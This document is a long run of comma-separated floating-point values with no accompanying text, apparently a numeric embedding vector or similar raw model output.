-0.021694965660572052, -0.03194541111588478, 0.04103279486298561, -0.025975031778216362, -0.04137396067380905, -0.03352717310190201, -0.00655578775331378, -0.023633401840925217, -0.026362719014286995, 0.026145612820982933, -0.02240831032395363, 0.02101263776421547, -0.00043178643682040274, -0.0019190508173778653, 0.012429246678948402, 0.0382104329764843, -0.004082344472408295, -0.005412111058831215, 0.0035318289883434772, -0.002789408201351762, -0.0020082187838852406, 0.024284716695547104, -0.024796463549137115, 0.011134372092783451, -0.00021649898553732783, -0.04692563787102699, -0.007893308065831661, -0.02430022321641445, 0.012258663773536682, 0.0028436845168471336, 0.02476544864475727, 0.0006328990566544235, 0.00008147485641529784, 0.003365123411640525, -0.011149879544973373, 0.006559664849191904, 0.018205782398581505, 0.02488950826227665, 0.01834535039961338, -0.004070713650435209, -0.003462045220658183, 0.04850740358233452, -0.016360392794013023, -0.005101961549371481, -0.008226718753576279, 0.006082809530198574, -0.019803054630756378, -0.02141583152115345, -0.023230208083987236, 0.010289213620126247, 0.01232844777405262, 0.010715669952332973, 0.045343875885009766, 0.0188105758279562, -0.014662323519587517, 0.003706288058310747, 0.0012725826818495989, 0.010653640143573284, 0.022563384845852852, -0.002337752841413021, 0.011537565849721432, -0.012026051990687847, 0.03309296444058418, -0.011824454180896282, 0.0031325111631304026, -0.005024423822760582, 0.015926184132695198, 0.020873069763183594, -0.024625880643725395, -0.038520582020282745, 0.012274171225726604, -0.0309684406965971, -0.03954407945275307, -0.019120724871754646, 0.0072497474029660225, -0.0023455065675079823, -0.01548422034829855, -0.03405442833900452, -0.006978366523981094, -0.008629913441836834, 0.027401719242334366, 0.04131193086504936, -0.006466619670391083, -0.009265719912946224, -0.005016670096665621, 0.017058229073882103, 0.005982011090964079, -0.05827711522579193, 0.00937427207827568, -0.010087616741657257, -0.014778629876673222, -0.014918196946382523, 0.0004749166255351156, 0.014065285213291645, -0.05464836582541466, -0.030921917408704758, 0.03155772387981415, 0.027479257434606552, -0.019880590960383415, -0.013305419124662876, -0.04128091409802437, -0.01656199060380459, -0.01654648222029209, -0.002779716160148382, 0.027463749051094055, -0.018019692972302437, 0.003841978497803211, -0.022997595369815826, 0.04295572265982628, 0.006776769179850817, 0.0017581606516614556, 0.015018995851278305, 0.0002725924423430115, -0.0008504884317517281, 0.014825152233242989, -0.030596259981393814, -0.01024269126355648, 0.007013258524239063, -0.026579823344945908, 0.001585640013217926, 0.016391407698392868, 0.02245483361184597, 0.0031150653958320618, 0.007335038855671883, -0.025944016873836517, 0.007935953326523304, -0.0014218422584235668, -0.02499805949628353, -0.015437697991728783, 0.0012813056819140911, -0.009730944409966469, -0.0063696978613734245, -0.008141427300870419, 0.0023939674720168114, 0.041001781821250916, 0.004714274313300848, 0.029836393892765045, -0.0016292547807097435, -0.004365356173366308, 0.0015536558348685503, -0.012235403060913086, -0.027076061815023422, -0.013879195787012577, 0.015941690653562546, 0.025664880871772766, -0.007691710721701384, 0.001788206398487091, -0.004190896637737751, -0.012374970130622387, -0.016282854601740837, -0.000294642144581303, -0.017740558832883835, -0.030813366174697876, -0.011754671111702919, -0.008133674040436745, -0.009986817836761475, -0.010948281735181808, 0.02315266989171505, -0.018376365303993225, 0.0012347832089290023, -0.0061874850653111935, 0.029712334275245667, 0.001957819564267993, 0.017151273787021637, -0.017228811979293823, -0.006699231918901205, 0.006765138823539019, 0.02992943860590458, -0.05753275752067566, -0.010134139098227024, -0.005795921199023724, -0.007230363320559263, -0.018562454730272293, 0.009924788028001785, 0.013863688334822655, 0.011863223277032375, -0.01660851202905178, 0.02158641442656517, -0.020702486857771873, -0.025509806349873543, -0.0020411722362041473, 0.02546328492462635, -0.03334108367562294, 0.03327905386686325, 0.011475536040961742, 0.003520198166370392, -0.023075131699442863, -0.020981622859835625, 0.01927579939365387, 0.021338295191526413, -0.012638597749173641, 0.007699464447796345, 0.007699464447796345, 0.005667984485626221, 0.019803054630756378, -0.03383732587099075, -0.00006396836397470906, 0.006392959039658308, -0.001903543365187943, -0.0185159333050251, -0.014173838309943676, 0.014127315953373909, -0.026347210630774498, -0.02147786132991314, 0.013390710577368736, -0.00987051147967577, -0.012010544538497925, -0.0009076722781173885, -0.00995580293238163, 0.024967044591903687, -0.00945956353098154, -0.016127780079841614, -0.006877568084746599, 0.009886019863188267, 0.03827246278524399, -0.019880590960383415, 0.014918196946382523, -0.023369774222373962, -0.02414514869451523, 0.011064588092267513, 0.02217569760978222, 0.038520582020282745, -0.008668682537972927, -0.0003406799805816263, -0.016856633126735687, -0.0013714429223909974, 0.018252305686473846, 0.021384816616773605, -0.004628983326256275, -0.006788400001823902, 0.026657359674572945, 0.005132976453751326, -0.004811196122318506, 0.010862990282475948, 0.009785220958292484, 0.0032817707397043705, -0.025944016873836517, -0.01562378741800785, 0.016251839697360992, -0.02802201919257641, -0.02552531473338604, 0.01082422211766243, 0.04615026339888573, 0.0009309335146099329, -0.017523454502224922, 0.002101263729855418, -0.00594711909070611, 0.017120258882641792, 0.005892843008041382, 0.0016806232742965221, 0.01580212265253067, -0.03690780699253082, 0.037652164697647095, 0.00011709360114764422, 0.05719159170985222, -0.031294096261262894, -0.020299293100833893, 0.004241296090185642, -0.009428548626601696, -0.02430022321641445, 0.003929208032786846, -0.02002015896141529, -0.017228811979293823, -0.014825152233242989, 0.015554003417491913, -0.021788012236356735, -0.024703416973352432, -0.008947816677391529, -0.016655035316944122, 0.021059159189462662, 0.004024191293865442, 0.0032003563828766346, 0.005160114262253046, 0.031123515218496323, -0.009366518817842007, -0.005082577001303434, 0.04996510595083237, -0.014801890589296818, 0.009126152843236923, -0.000012524108569778036, -0.01163061149418354, -0.026781421154737473, 0.0012415677774697542, -0.0094052879139781, -0.014228113926947117, 0.03268977254629135, -0.02969682775437832, 0.012429246678948402, 0.02043886110186577, -0.011731409467756748, 0.023013101890683174, -0.009017600677907467, -0.02383499965071678, -0.01724431850016117, 0.00830425601452589, -0.009637899696826935, -0.0188105758279562, -0.02088857814669609, 0.012692873366177082, 0.10179110616445541, -0.031092500314116478, 0.007761494256556034, -0.017275333404541016, 0.018159260973334312, 0.010056601837277412, -0.00239590578712523, 0.015112040564417839, -0.013824919238686562, -0.004900364205241203, 0.009777466766536236, -0.006086686626076698, -0.010343490168452263, 0.0004133713082410395, 0.028983483090996742, -0.00039810611633583903, -0.01823679730296135, -0.01463906280696392, 0.036442581564188004, -0.006307668052613735, 0.015220592729747295, -0.0014160268474370241, 0.01304954569786787, -0.010940528474748135, 0.026486778631806374, -0.01932232268154621, -0.011328214779496193, -0.02326122298836708, -0.026719391345977783, -0.02129177190363407, 0.006648832466453314, -0.010258198715746403, -0.02088857814669609, -0.004237419459968805, 0.008901294320821762, 0.009552608244121075, 0.020051173865795135, 0.009847250767052174, -0.00526866689324379, 0.002601379994302988, 0.0011872915783897042, -0.010560594499111176, -0.01915173977613449, -0.010444289073348045, 0.008094904944300652, -0.003787702415138483, 0.03830347955226898, 0.0020624950993806124, -0.018965650349855423, -0.012778164818882942, 0.009560362435877323, -0.01608125865459442, 0.03557416424155235, 0.01030472107231617, 0.00969217624515295, 0.03461270034313202, 0.0038245324976742268, -0.010839729569852352, -0.012894471175968647, -0.02262541465461254, -0.007970845326781273, 0.012064820155501366, -0.02262541465461254, -0.013181359507143497, 0.005357834976166487, -0.006532526575028896, -0.01921376958489418, 0.006780646275728941, -0.01741490140557289, 0.03194541111588478, 0.014452972449362278, 0.011103356257081032, -0.0010205861181020737, -0.006854306906461716, 0.019120724871754646, 0.007901061326265335, 0.01380941178649664, 0.021276265382766724, -0.01788012683391571, -0.01531363744288683, 0.040784675627946854, 0.027045046910643578, -0.003717918647453189, 0.027122585102915764, -0.01319686695933342, 0.025075597688555717, -0.01874854415655136, -0.01383267343044281, 0.005117469001561403, -0.004911994561553001, 0.005020547192543745, 0.005532294046133757, 0.017259826883673668, 0.004919748287647963, 0.0013045668601989746, 0.030642783269286156, 0.02478095516562462, -0.012119096703827381, -0.016251839697360992, -0.017957663163542747, -0.007001627702265978, -0.011568580754101276, 0.015321391634643078, -0.01542219053953886, -0.0010273706866428256, 0.006222377065569162, -0.00310343480668962, 0.02129177190363407, 0.023013101890683174, -0.02459486573934555, -0.031092500314116478, -0.027525778859853745, 0.01660851202905178, 0.011553073301911354, 0.0033205393701791763, 0.03755912184715271, 0.009056368842720985, -0.016360392794013023, -0.01967899315059185, -0.033248040825128555, -0.005516786593943834, -0.03259672597050667, 0.03693882003426552, -0.02667286805808544, -0.008110412396490574, 0.00015337868535425514, -0.0073854378424584866, -0.016701556742191315, 0.023478327319025993, 0.021384816616773605, 0.0347367599606514, 0.013266650028526783, 0.003948592580854893, -0.014863921329379082, 0.021198727190494537, -0.012576567009091377, 0.015143055468797684, 0.013576800003647804, -0.008405054919421673, 0.0014518880052492023, -0.01569357141852379, 0.03141815587878227, 0.026781421154737473, -0.0036694577429443598, 0.001903543365187943, 0.0037024111952632666, 0.016344886273145676, 0.006055671721696854, 0.008319763466715813, 0.03408544510602951, 0.010203923098742962, -0.016810109838843346, 0.011165386997163296, 0.020190740004181862, 0.007183840963989496, 0.012336201034486294, 0.011700394563376904, -0.014452972449362278, 0.007819647900760174, 0.0024133517872542143, 0.013507016003131866, -0.016360392794013023, 0.0026517792139202356, -0.008195703849196434, -0.011320461519062519, 0.026641853153705597, -0.0009982940973713994, -0.05052337422966957, -0.00966891460120678, -0.023199191316962242, 0.0025975031312555075, 0.011142125353217125, -0.010925021022558212, 0.005633092485368252, 0.013289911672472954, -0.018252305686473846, -0.0007080134237185121, 0.034240517765283585, 0.02771187014877796, -0.023943550884723663, 0.00851360708475113, 0.012537798844277859, 0.010700162500143051, 0.010025586932897568, 0.014049777761101723, -0.03790028393268585, -0.003239125246182084, 0.00020789717382285744, -0.03146468102931976, 0.019074201583862305, 0.00960688479244709, 0.03669070079922676, -0.002715747570618987, -0.01788012683391571, -0.0019142046803608537, -0.005132976453751326, -0.022129176184535027, -0.008265487849712372, -0.012111343443393707, 0.00890904851257801, 0.0030762965325266123, -0.006237884517759085, -0.01453050971031189, 0.0034445992205291986, 0.0007099518552422523, -0.017383886501193047, -0.0075560202822089195, 0.012584321200847626, -0.002250523306429386, -0.005454756785184145, -0.007579281460493803, 0.0008621190208941698, 0.008180196397006512, -0.0034659220837056637, 0.0017019461374729872, -0.0007269132183864713, -0.007490113377571106, -0.022253235802054405, 0.01241373922675848, -0.002463751006871462, 0.0034581683576107025, 0.02146235480904579, 0.009366518817842007, 0.013972240500152111, 0.01045204233378172, -0.0076025426387786865, 0.0457160547375679, -0.04159106686711311, 0.008149181492626667, 0.012739395722746849, -0.03963712230324745, -0.008529114536941051, -0.015360160730779171, 0.0039505306631326675, -0.014383189380168915, -0.028549272567033768, 0.022005116567015648, -0.010072109289467335, -0.004900364205241203, 0.0016583312535658479, 0.00859114434570074, -0.009661161340773106, -0.012196633964776993, 0.012367216870188713, 0.006032410077750683, -0.0002392755850451067, 0.020733501762151718, -0.02274947613477707, -0.01609676517546177, 0.025013567879796028, -0.011909745633602142, 0.004725905135273933, 0.0017891756724566221, -0.015352406539022923, -0.009769713506102562, 0.015298129990696907, 0.014972473494708538, -0.010172908194363117, 0.017756065353751183, 0.016406916081905365, 0.013103822246193886, -0.02367992326617241, -0.004869349300861359, 0.004501046612858772, -0.015034503303468227, 0.005888965912163258, -0.0008548499317839742, -0.01475536823272705, 0.01391796488314867, 0.01718228869140148, 0.02408311888575554, -0.009932542219758034, 0.001923896954394877, -0.0009837558027356863, -0.007412576116621494, 0.0007075288449414074, 0.022827012464404106, -0.014049777761101723, -0.007455221842974424, 0.0013084437232464552, -0.018965650349855423, 0.07474605739116669, -0.0008936186204664409, -0.019803054630756378, 0.000177851426997222, -0.05939365550875664, -0.012506783939898014, -0.008459331467747688, -0.008288748562335968, -0.011273939162492752, -0.020640457049012184, 0.0013665967853739858, -0.016236333176493645, -0.021369310095906258, 0.03275180235505104, 0.0024288592394441366, -0.008707450702786446, 0.002671163761988282, -0.007792509626597166, 0.013995502144098282, 0.004756920039653778, 0.04819725081324577, 0.01441420428454876, 0.0012008605990558863, -0.015088779851794243, -0.006055671721696854, -0.006931844167411327, -0.024377761408686638, 0.0025025198701769114, -0.0364735946059227, 0.0130262840539217, -0.005954872816801071, -0.016484452411532402, -0.018128246068954468, -0.0037818870041519403, -0.017290841788053513, -0.019756531342864037, -0.0020489259622991085, -0.013995502144098282, -0.0011727532837539911, 0.005253159441053867, -0.01163061149418354, -0.01915173977613449, -0.008808249607682228, -0.021105682477355003, 0.005865704733878374, 0.013677598908543587, 0.003258509561419487, -0.017911141738295555, -0.025913001969456673, 0.012584321200847626, 0.008505853824317455, 0.016515467315912247, 0.004322710447013378, 0.009622392244637012, 0.001402457826770842, 0.014561524614691734, 0.0005413080216385424, -0.013413971289992332, -0.021570906043052673, -0.04177715629339218, 0.025959523394703865, -0.003902069991454482, 0.016298362985253334, 0.007013258524239063, -0.009816235862672329, -0.00043154411832802, 0.003874931950122118, 0.011436767876148224, -0.029619289562106133, -0.011847715824842453, -0.004249049816280603, -0.004539815243333578, 0.031045977026224136, 0.0008955570519901812, 0.001565286424010992, -0.00043202872620895505, 0.015507481060922146, 0.02436225302517414, -0.01921376958489418, -0.02088857814669609, 0.0028708225581794977, -0.02558734454214573, -0.007358300033956766, 0.009288981556892395, -0.015228346921503544, 0.013243389315903187, 0.013212374411523342, 0.021617429330945015, -0.023509342223405838, -0.0006484065670520067, 0.008567883633077145, 0.015988213941454887, 0.02274947613477707, -0.018903620541095734, -0.02177250385284424, 0.019306814298033714, -0.0057532754726707935, -0.0003646681143436581, 0.04404124617576599, 0.007606419734656811, -0.007571527734398842, -0.003576412796974182, 0.011095602996647358, -0.03439559414982796, 0.011653872206807137, -0.01817476749420166, 0.022082652896642685, -0.003847793908789754, 0.0011136310640722513, 0.01568581722676754, -0.008498099632561207, 0.01562378741800785, 0.024641387164592743, 0.030472200363874435, 0.00426843436434865, -0.011289446614682674, 0.001964604016393423, -0.019291307777166367, 0.01724431850016117, 0.004970147740095854, -0.007916569709777832, 0.011622857302427292, 0.008847017772495747, 0.02696751058101654, 0.006877568084746599, 0.00688532181084156, 0.0005548770423047245, 0.0329999215900898, -0.012940993532538414, 0.029588274657726288, -0.004419632256031036, -0.00010728026973083615, -0.01927579939365387, -0.038458552211523056, -0.008381793275475502, -0.006706985644996166, 0.022935565561056137, -0.005466387141495943, -0.023819491267204285, 0.004714274313300848, -0.011553073301911354, -0.01383267343044281, -0.013452740386128426, 0.006334806326776743, -0.010552841238677502, 0.010839729569852352, -0.009273474104702473, -0.017120258882641792, -0.02737070433795452, 0.004725905135273933, 0.004815072752535343, 0.012142358347773552, 0.0015381482662633061, 0.0017591299256309867, 0.002202062401920557, -0.025432270020246506, -0.003609366249293089, -0.011157632805407047, -0.009715436957776546, 0.029309140518307686, -0.0040319450199604034, -0.016748080030083656, -0.007916569709777832, -0.017523454502224922, -0.023571372032165527, -0.020935099571943283, -0.02465689554810524, -0.03213150054216385, 0.0073854378424584866, 0.012336201034486294, 0.0072458707727491856, 0.008761727251112461, 0.0021032022777944803, 0.0036423197016119957, -0.005408233962953091, 0.005605954676866531, 0.0034387840423732996, -0.013902457430958748, 0.005931611638516188, 0.01218112651258707, -0.012289678677916527, 0.03393036872148514, -0.002163293771445751, 0.02164844423532486, 0.015895169228315353, -0.011483290232717991, 0.008063890039920807, 0.010134139098227024, -0.0057067531161010265, 0.01615879498422146, -0.0012086143251508474, 0.009296734817326069, -0.008854771964251995, 0.0004509284917730838, -0.029712334275245667, -0.011723656207323074, -0.012382724322378635, -0.005520663224160671, -0.01481739804148674, 0.014662323519587517, 0.002737070433795452, -0.0022059392649680376, 0.02043886110186577, -0.0010448165703564882, 0.02332325279712677, -0.007637434639036655, 0.008893541060388088, 0.005396603606641293, 0.014646816067397594, 0.0055671860463917255, 0.01667054183781147, -0.005450879689306021, 0.005803674925118685, 0.03321702405810356, 0.021152203902602196, 0.01667054183781147, 0.015724586322903633, -0.005113591905683279, -0.013902457430958748, 0.0024094749242067337, -0.005501279141753912, 0.015243854373693466, -0.0007966968696564436, -0.0016699619591236115, -0.010126384906470776, -0.0066759707406163216, 0.01411956176161766, 0.00830425601452589, -0.019353337585926056, -0.010529579594731331, -0.013243389315903187, -0.014437464997172356, -0.010149646550416946, 0.010258198715746403, 0.006117701530456543, -0.0038652396760880947, 0.0013113514287397265, 0.005074823275208473, -0.00018281866505276412, 0.007055904250591993, 0.007335038855671883, -0.004043575841933489, -0.015127548016607761, -0.005187252536416054, -0.00045698610483668745, 0.01887260563671589, 0.013297664932906628, -0.015119794756174088, -0.006699231918901205, 0.011343722231686115, 0.005315189249813557, -0.014189345762133598, -0.0025374116376042366, 0.011506550945341587, 0.011498797684907913, 0.010351243428885937, -0.024005580693483353, 0.006943474989384413, -0.005733891390264034, -0.003799333004280925, -0.0151973320171237, -0.0061060707084834576, 0.01397999469190836, 0.005857951007783413, -0.005861828103661537, -0.006144839338958263, -0.00873846560716629, -0.02281150594353676, -0.015243854373693466, -0.007482359651476145, 0.0020295416470617056, -0.0007036519818939269, -0.022501355037093163, -0.008505853824317455, 0.002182678086683154, -0.01383267343044281, 0.008234472945332527, 0.004698766861110926, 0.005543924402445555, -0.005288050975650549, -0.01978754624724388, 0.023168176412582397, -0.0037838255520910025, 0.000521439069416374, 0.011056833900511265, -0.0034853063989430666, 0.01741490140557289, 0.002426920924335718, -0.0027855313383042812, -0.00009564965876052156, 0.0024831355549395084, -0.0020702488254755735, -0.008358532562851906, -0.010599363595247269, -0.005776536650955677, 0.0038400401826947927, -0.024703416973352432, 0.0015681940130889416, 0.01435217447578907, 0.008660928346216679, 0.0011969837360084057, -0.018903620541095734, -0.0011058772215619683, -0.004020314663648605, -0.02332325279712677, 0.022827012464404106, -0.01967899315059185, -0.01679460145533085, -0.002240831032395363, -0.003584166755899787, 0.04075366258621216, -0.016484452411532402, -0.0020702488254755735, -0.00018657438340596855, -0.020113203674554825, -0.010847482830286026, -0.006377451587468386, -0.017089243978261948, 0.0017697913572192192, -0.008443824015557766, 0.022299759089946747, -0.0035182598512619734, -0.006660463288426399, -0.016515467315912247, 0.0015798247186467052, 0.04236643761396408, -0.00890904851257801, -0.007300146855413914, -0.01944638229906559, 0.007831278257071972, 0.011049080640077591, -0.0031170037109404802, -0.0034193997271358967, -0.010382259264588356, -0.01313483715057373, 0.014631308615207672, -0.014127315953373909, -0.013972240500152111, -0.021322786808013916, 0.006679847836494446, -0.00771109526976943, -0.017383886501193047, 0.016763586550951004, 0.001239629345946014, 0.009823989123106003, 0.00042645575013011694, -0.034984879195690155, 0.01614328846335411, -0.0011078156530857086, -0.00688532181084156, -0.0046483674086630344, 0.021555399522185326, -0.0012619212502613664, -0.007389314938336611, 0.04075366258621216, -0.010358997620642185, -0.026145612820982933, 0.011250677518546581, 0.0050787003710865974, -0.018221290782094002, -0.004803442396223545, -0.002487012417986989, 0.000488001067424193, -0.027277659624814987, 0.007296270225197077, 0.02916957251727581, 0.005543924402445555, -0.005935488734394312, 0.0029716212302446365, 0.005912227090448141, 0.010607116855680943, 0.001996588194742799, 0.009924788028001785, 0.0004022252978757024, -0.01397999469190836, -0.008358532562851906, 0.00004609841198544018, 0.01204155944287777, -0.018190275877714157, 0.019461888819932938, 0.005233774892985821, -0.015709077939391136, -0.0006983212660998106, 0.017911141738295555, -0.0005054469802416861, -0.01096378918737173, 0.007757617626339197, 0.013034038245677948, 0.006920213811099529, -0.013429478742182255, -0.005005039740353823, -0.012436999939382076, 0.002525781048461795, -0.009110645391047001, -0.015228346921503544, -0.010746684856712818, -0.008901294320821762, -0.005780413746833801, -0.005978133995085955, 0.008420562371611595, 0.00003437693521846086, 0.008761727251112461, -0.007331161759793758, -0.009886019863188267, -0.03107699193060398, 0.00705978088080883, -0.018391873687505722, -0.0011194463586434722, 0.005408233962953091, 0.022020623087882996, -0.027355197817087173, 0.023369774222373962, 0.0028339922428131104, 0.011987282894551754, -0.039326973259449005, -0.010831975378096104, 0.008350778371095657, 0.005807552020996809, 0.009591377340257168, 0.008816002868115902, -0.002878576284274459, 0.023121654987335205, 0.022532369941473007, -0.0023009225260466337, 0.002647902350872755, 0.006389082409441471, 0.01597270555794239, 0.013057298958301544, 0.01004109438508749, 0.009599130600690842, -0.02622315101325512, -0.0009159106411971152, -0.0021768626756966114, -0.0159106757491827, 0.0033515545073896646, 0.021090174093842506, -0.005195006262511015, 0.017725050449371338, 0.017492439597845078, 0.005074823275208473, 0.016282854601740837, 0.0269209872931242, -0.025850972160696983, 0.005873458459973335, 0.0042451731860637665, -0.025246180593967438, -0.012553306296467781, -0.01904318667948246, -0.006683724466711283, 0.005117469001561403, 0.01811273768544197, 0.01811273768544197, -0.011491043493151665, -0.00002512393803044688, -0.0028320536948740482, 0.004481662064790726, -0.006032410077750683, 0.0019161432282999158, -0.007439714390784502, 0.031108006834983826, -0.0009871481452137232, 0.015065518207848072, -0.003000697586685419, -0.016856633126735687, 0.01125843171030283, -0.019182754680514336, 0.040784675627946854, -0.01753896102309227, 0.020966114476323128, -0.01090951357036829, 0.011072341352701187, -0.014608047902584076, -0.0033980768639594316, 0.019647978246212006, -0.007040396332740784, -0.002174924360588193, 0.001713576726615429, -0.0031441417522728443, -0.010707915760576725, -0.00868418999016285, 0.005280297249555588, 0.02060944214463234, 0.03613243252038956, 0.0040280683897435665, -0.006745754275470972, -0.007447468116879463, -0.015453205443918705, -0.01574009284377098, -0.007106303237378597, -0.0030782350804656744, 0.00048097423859871924, 0.029076527804136276, -0.005272543523460627, 0.010444289073348045, -0.017756065353751183, 0.007831278257071972, -0.03275180235505104, -0.00028349613421596587, 0.005280297249555588, -0.0015730401501059532, 0.0013966425321996212, -0.005326820071786642, -0.005117469001561403, 0.042459484189748764, -0.004066837020218372, -0.003427153453230858, 0.008296502754092216, 0.017725050449371338, -0.01073893066495657, 0.003737302962690592, 0.006482127122581005, -0.024579357355833054, -0.004229665733873844, -0.003628750564530492, -0.01597270555794239, -0.027742885053157806, 0.009366518817842007, -0.004000930115580559, -0.022764982655644417, 0.02285802736878395, -0.024176163598895073, 0.002120648045092821, 0.0095448549836874, 0.019461888819932938, 0.01146002858877182, 0.0001344789343420416, 0.00461735250428319, 0.005908350460231304, -0.004621229600161314, -0.01615879498422146, 0.020935099571943283, -0.01933782920241356, 0.0008626036578789353, 0.0022175698541104794, -0.009738698601722717, -0.00684267608448863, -0.004749166313558817, 0.024501821026206017, -0.011615104041993618, 0.009924788028001785, -0.0095448549836874, -0.010831975378096104, -0.01484841387718916, 0.00035836821189150214, -0.012289678677916527, -0.002012095646932721, -0.03168178349733353, 0.002742885844781995, -0.003931146580725908, 0.013142590411007404, -0.001983988331630826, -0.022129176184535027, -0.014569278806447983, -0.011359229683876038, -0.017275333404541016, -0.004756920039653778, 0.002965805819258094, -0.016391407698392868, 0.028270138427615166, -0.0038865625392645597, 0.0051252227276563644, 0.0009207567200064659, 0.008498099632561207, 0.01747693121433258, -0.007307900581508875, 0.025680389255285263, -0.00487710302695632, 0.005916104186326265, -0.01377064362168312, -0.008940063416957855, -0.00039616768481209874, 0.0031790337525308132, -0.020624950528144836, 0.017213303595781326, 0.004357602447271347, -0.001037062844261527, -0.013003023341298103, -0.03179033845663071, -0.009296734817326069, 0.021493369713425636, -0.0039408388547599316, 0.005543924402445555, -0.00694735161960125, -0.004179266281425953, -0.0031596494372934103, -0.015305884182453156, 0.0018318212823942304, -0.028781885281205177, 0.019477397203445435, -0.006078932899981737, -0.0005878304946236312, 0.008978831581771374, 0.011731409467756748, -0.013693106360733509, -0.00651314202696085, -0.00003831438152701594, -0.010700162500143051, -0.028037525713443756, 0.02366441674530506, 0.018996665254235268, 0.014747614972293377, -0.01169264130294323, 0.00395246921107173, 0.005683491937816143, -0.0045204306952655315, -0.012692873366177082, 0.026192136108875275, -0.006117701530456543, -0.004194773733615875, -0.004524307791143656, -0.004241296090185642, -0.000568930699955672, 0.039854228496551514, 0.039326973259449005, -0.005036054644733667, -0.0009551639086566865, 0.0006125455256551504, 0.015771107748150826, 0.012452507391571999, -0.006679847836494446, 0.005074823275208473, -0.000020065832359250635, 0.020531905815005302, -0.003719857195392251, 0.019725516438484192, -0.004830580670386553, -0.0074513447470963, -0.006009148899465799, 0.007261378224939108, 0.008831510320305824, -0.005198883358389139, -0.01800418645143509, 0.022237729281187057, 0.013258896768093109, 0.004896487109363079, -0.01719779707491398, -0.015817631036043167, -0.012785918079316616, 0.004187020007520914, 0.028254631906747818, 0.002446305239573121, 0.002269907621666789, 0.00012624058581423014, 0.01891912706196308, -0.0013656276278197765, 0.024842984974384308, -0.008180196397006512, -0.004454524256289005, -0.010847482830286026, -0.0016486390959471464, -0.008156935684382915, 0.023633401840925217, 0.027386212721467018, -0.030828872695565224, 0.015491973608732224, 0.0012948747025802732, -0.013444986194372177, -0.005454756785184145, -0.013142590411007404, -0.0044312626123428345, -0.004078467842191458, 0.011149879544973373, -0.006133208982646465, -0.005559432320296764, -0.019074201583862305, 0.0014993796357885003, 0.0020973868668079376, 0.012754903174936771, -0.003128634300082922, 0.022718459367752075, 0.012770410627126694, -0.0286423172801733, -0.003407769137993455, -0.030301619321107864, -0.005059315823018551, -0.011870977468788624, 0.010436534881591797, 0.015181824564933777, -0.026610838249325752, -0.001585640013217926, -0.009777466766536236, -0.003966038580983877, -0.00026290028472431004, -0.013406218029558659, -0.02003566548228264, -0.023137161508202553, -0.009226951748132706, 0.0002825269184540957, -0.014483987353742123, 0.00040779830305837095, 0.00470264395698905, 0.007994106970727444, 0.0060169026255607605, -0.003475614357739687, -0.008940063416957855, -0.011413506232202053, -0.001354966196231544, -0.009637899696826935, -0.017337365075945854, -0.016174303367733955, -0.002085756277665496, -0.01539892889559269, -0.017058229073882103, -0.007683956995606422, -0.03253469616174698, 0.003684965195134282, -0.001300689997151494, 0.012289678677916527, -0.0024695664178580046, 0.004070713650435209, -0.024284716695547104, 0.021912071853876114, -0.015367913991212845, 0.01667054183781147, -0.0005728076212108135, -0.0021768626756966114, -0.005764906294643879, 0.003557028481736779, -0.006738000549376011, 0.0027448241598904133, -0.016856633126735687, -0.011359229683876038, 0.007877800613641739, 0.004718151409178972, -0.017740558832883835, -0.008567883633077145, 0.045529965311288834, 0.006261145696043968, -0.0019684808794409037, 0.015647048130631447, 0.029092034325003624, -0.012057066895067692, -0.0026110722683370113, 0.012033805251121521, 0.002799100475385785, -0.022005116567015648, 0.013778396882116795, -0.022594399750232697, -0.011018065735697746, 0.003973792307078838, 0.0056175850331783295, 0.008405054919421673, -0.022423818707466125, -0.0188105758279562, -0.009637899696826935, -0.01766302064061165, -0.017507946118712425, 0.010056601837277412, 0.00018390904006082565, 0.02095060795545578, -0.006695355288684368, 0.013429478742182255, -0.0005980072310194373, 0.02177250385284424, 0.019523918628692627, 0.005167867988348007, 0.02175699733197689, 0.0008592113736085594, 0.02516864240169525, 0.003785763867199421, -0.012661858461797237, -0.015367913991212845, 0.010320228524506092, -0.018655499443411827, 0.0022931687999516726, -0.014212606474757195, 0.00472978176549077, 0.006536403205245733, -0.0007525974651798606, -0.008769480511546135, 0.011901992373168468, -0.019430873915553093, -0.019601456820964813, 0.001889974344521761, -0.011599595658481121, 0.010289213620126247, 0.008498099632561207, -0.007168333511799574, -0.005012793466448784, -0.0006992904818616807, -0.013181359507143497, 0.004322710447013378, 0.005974257364869118, 0.018655499443411827, -0.007075288332998753, -0.011335968971252441, -0.009312242269515991, -0.02003566548228264, 0.03700084984302521, 0.012832440435886383, 0.007098549511283636, -0.00043493640259839594, -0.0019607271533459425, 0.0050476850010454655, 0.005737768020480871, -0.016453437507152557, -0.024098625406622887, 0.016220824792981148, -0.00859889853745699, -0.011646118946373463, 0.0010457857279106975, 0.018190275877714157, -0.0063115451484918594, -0.009110645391047001, -0.005931611638516188, 0.007935953326523304, 0.0006973520503379405, 0.01311157550662756, 0.012646351009607315, -0.003089865669608116, 0.0034038922749459743, 0.008343025110661983, -0.005322942975908518, -0.010754438117146492, -0.014685585163533688, -0.0011397998314350843, 0.015786616131663322, -0.00144316500518471, -0.019461888819932938, -0.007765371352434158, 0.00925796665251255, 0.00698999734595418, 0.019896099343895912, -0.0140342703089118, 0.003483368083834648, -0.012576567009091377, 0.009281227365136147, 0.00333410850726068, -0.007571527734398842, 0.020268278196454048, -0.008327517658472061, 0.020299293100833893, -0.01567806303501129, -0.0012948747025802732, -0.009126152843236923, -0.013305419124662876, -0.017445916309952736, 0.0004574707127176225, -0.023230208083987236, -0.005551678128540516, -0.017058229073882103, 0.01753896102309227, 0.006551911123096943, 0.0003418915148358792, -0.023307744413614273, 0.007172210142016411, -0.00001883916775113903, 0.01939985901117325, -0.016934169456362724, -0.002946421504020691, -0.006334806326776743, -0.009614638052880764, 0.01597270555794239, 0.014863921329379082, 0.0011708148522302508, 0.0001744591718306765, -0.015298129990696907, -0.0065402803011238575, -0.0007138287764973938, -0.008063890039920807, -0.02239280380308628, 0.0073854378424584866, -0.007176087237894535, 0.0017019461374729872, -0.0012493215035647154, -0.0017436224734410644, -0.01626734808087349, -0.01174691691994667, 0.004524307791143656, -0.02743273414671421, 0.000904764630831778, 0.0016467006644234061, 0.02002015896141529, -0.0034969369880855083, -0.012747149914503098, -0.02383499965071678, -0.0014896874781697989, 0.0190897099673748, -0.0007574435439892113, 0.018717529252171516, -0.00028373845270834863, -0.01282468717545271, 0.014003255404531956, 0.00784290861338377, -0.01542219053953886, -0.0027855313383042812, 0.009343257173895836, -0.015065518207848072, -0.000015022872503323015, -0.011080095544457436, 0.004923625383526087, -0.01788012683391571, 0.039389003068208694, 0.01374738197773695, 0.016112273558974266, -0.00018875511887017637, 